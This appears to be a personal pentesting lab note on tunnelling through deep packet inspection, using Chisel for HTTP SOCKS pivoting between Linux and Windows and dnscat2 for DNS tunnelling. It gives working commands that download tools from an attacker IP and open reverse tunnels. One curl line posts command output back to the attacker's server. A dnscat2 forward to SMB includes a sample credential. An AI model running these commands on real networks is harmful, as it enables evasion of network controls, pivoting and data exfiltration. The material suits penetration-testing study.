Tunneling Through Deep Packet Inspection

HTTP Tunnelling.

# used to bypass the restriction to access the the network.
# For example: 
# If Admin has configured the termination of all outbound connection then no one will able to use SSH for making connections.

Above is network topology.

HTTP Tunneling with Chisel

Blog for help:

Part 1 – Using Chisel with a Socks5 proxy and Proxychains for PivotingBramleySecurityTesting

https://ap3x.github.io/posts/pivoting-with-chisel/ap3x.github.io

Linux vs Linux

To perform HTTP tunneling, use the following general command and modify it according to your scenario.

The Chisel server on our Kali machine will listen on TCP port 1080, a SOCKS proxy port.

# Ensure the chisel server and client are running the same version.
# We will configure the SOCKS proxy port.
# You can download the latest version of Chisel from this link.
sudo cp $(which chisel) /var/www/html/

# We will make use of apache web server to trasver the file.
sudo systemctl start apache2

# then we will transfer and run the command on client machine
# Step 1: Transfer file
wget 192.168.45.177/chisel -O /tmp/chisel && chmod +x /tmp/chisel

# We can confirm that file have been transferred using below command.
tail -f /var/log/apache2/access.log

# Step 2: run the chisel server on our kali linux
chisel server --port 8080 --reverse  

# Step 3: Log the incoming traffic using tcpdump.
sudo tcpdump -nvvvXi tun0 tcp port 8080

# Step 4: Run the chisel client in shell and also print the output of the command in kali
/tmp/chisel client 192.168.45.177:8080 R:socks &> /tmp/output; curl --data @/tmp/output http://192.168.45.177:8080/

# If we encounter an error in tcpdump, we will examine it. If it's a version issue, we will update chisel to the correct version and rerun it.
# For Lab environment this is working:
wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd64.gz
# unzip it and send to apache server.
gunzip chisel_1.8.1_linux_amd64.gz 
sudo cp ./chisel /var/www/html

# After successful running of chisel we check that chiesel is running on specified port in our kali machine.
ss -ntplu
# if not then check proxychains.conf file and set the correct port.

# Step 5: Using Socks port to SSH into the system.
# SSH doesn't offer a generic SOCKS proxy command-line option.
# we will use ncat tool for the same.
# Install command: sudo apt install ncat
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' [email protected]
# above is the way we can connect using SSH with SOCKS port.

Linux vs Windows

I used the below command in one of the labs to enumerate internal networks. Below is how I performed it.

I will be using a chisel for port forwarding.

Download Chisel and run http server.

wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd64.gz

gunzip chisel_1.8.1_linux_amd64.gz 

wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_windows_amd64.gz

gunzip chisel_1.8.1_windows_amd64.gz

python3 -m http.server 8000

Send windows chisel to window temp.

iwr -uri http://192.168.45.205:8000/chisel_1.8.1_windows_amd64 -Outfile chisel.exe

Establishing connection between linux and windows internal network

# In kali linux give execute permission to chisel.
chmod a+x chisel_1.8.1_linux_amd64

# Run the chisel as a server.
 ./chisel_1.8.1_linux_amd64 server -p 8001 --reverse

Check the proxychain.conf file if there is 1080 port added.

# In windows run chisel to connect back to kali linux.
./chisel.exe client $KaliIP:8001 R:1080:socks

We got the listening msg in kali linux chisel server.

DNS Tunneling with dnscat2

Read the PDF for information. Use the PDF for guidance on this topic and commands.

Network Topology:

GitHub - iagox86/dnscat2GitHub

# Querying a DNS server for specific record types using nslookup.
nslookup -type=<record_type> <domain_name>

# Example:
nslookup -type=txt www.feline.corp
# By default if you query the DNS server it will just give you A record that is ipv4 address only.
nslookup exfiltrated-data.feline.corp

# A record (IPv4 address):
nslookup -type=A exfiltrated-data.feline.corp

# AAAA record (IPv6 address):
nslookup -type=AAAA exfiltrated-data.feline.corp

# MX record (Mail exchange):
nslookup -type=MX exfiltrated-data.feline.corp

# TXT record (Text records, often for verification or security):
nslookup -type=TXT exfiltrated-data.feline.corp

# NS record (Name server):
nslookup -type=NS exfiltrated-data.feline.corp

# We will Download server and client from above Git repo
# We will run server and client.
dnscat2-server <NameOfServer>
# example: dnscat2-server feline.corp

# Run dnscat2 In client as well
# Example: ./dnscat feline.corp
./dnscat <NameOfServer>

# If there is successful connection, You will notice same statement on server and cient.

# To list active windows.
windows

# Switch to active window
window -i <WindowNumber>
# Example: window -i 1

# After connection to PGDATABASE
# Use "?" to get help.
# Use listen to create DNS Tunneling.
# Example: listen 127.0.0.1:4455 172.16.2.11:445

# then we can list the SMB using below command
# example: smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234

PreviousPort Forwarding with Windows Tools NextCollecting data

Last updated 1 year ago